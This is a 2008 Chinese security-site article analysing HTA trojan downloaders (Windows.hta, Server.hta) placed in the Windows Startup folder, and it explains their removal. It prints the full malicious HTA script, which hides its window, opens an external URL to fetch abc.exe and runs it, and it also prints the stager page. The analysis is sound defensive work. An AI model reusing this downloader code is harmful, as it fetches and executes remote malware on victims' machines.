科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道Windows.hta Server.hta 病毒分析及解决办法

Windows.hta Server.hta 病毒分析及解决办法

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

如果防火墙提示Windows.hta 或 Server.hta 访问网络,即是中毒的.表现,解决办法很.简单,删除C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。

作者:zdnet安全频道 来源:论坛整理 2008年6月13日

关键字: 木马 病毒

  • 评论
  • 分享微博
  • 分享邮件
最近几天接连遇见.HTA(HTML Application的缩写,HTML应用程序)编写的病毒下载器,主要是以下这两个:
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta

以Windows.hta为例,看下代码:

=============================================================
<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
=============================================================

程序随机自启动,成功执行后.连接到地址
http://www.if56.cn/lo/downmm.html下载木马,downmm.html代码如下:

=============================================================
<html>
<title>
downmm
</title>
<script src="
abc.exe"></script>
<body>
start download.............................
</body>
</html>

=============================================================

这个abc.exe经过avast扫描,发现木马病毒:WIN32:Nilage-AI

解决办法:
如果防火墙提示Windows.hta 或 Server.hta 访问网络,即是中毒的.表现,解决办法很.简单,删除
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章